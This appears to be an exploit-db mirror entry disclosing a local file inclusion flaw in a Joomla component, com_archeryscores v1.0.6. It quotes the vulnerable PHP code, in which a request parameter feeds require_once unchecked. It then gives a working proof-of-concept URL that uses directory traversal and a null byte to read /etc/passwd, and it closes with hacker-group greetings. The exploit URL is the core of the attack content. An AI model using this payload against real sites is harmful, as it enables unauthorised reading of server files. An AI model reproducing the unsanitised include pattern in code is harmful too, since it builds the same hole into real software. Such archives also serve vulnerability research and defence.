exploit-db-mirror/exploits/php/webapps/12282.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1.4 KiB
Text

================================================================================================
Title : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
Vendor : http://lispeltuut.org/
Download : http://lispeltuut.org/archery-scores/download
Date : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
================================================================================================
[+] Vulnerable
./components/com_archeryscores/archeryscores.php
Line 22: if($controller = JRequest::getVar('controller')) {
Line 23: require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
Line 24: }
[+] Exploit
http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
================================================================================================
Greetz to:
Penghuni #nob0dy priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, madonk, & Bot² Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
================================================================================================
# ./wishnusakti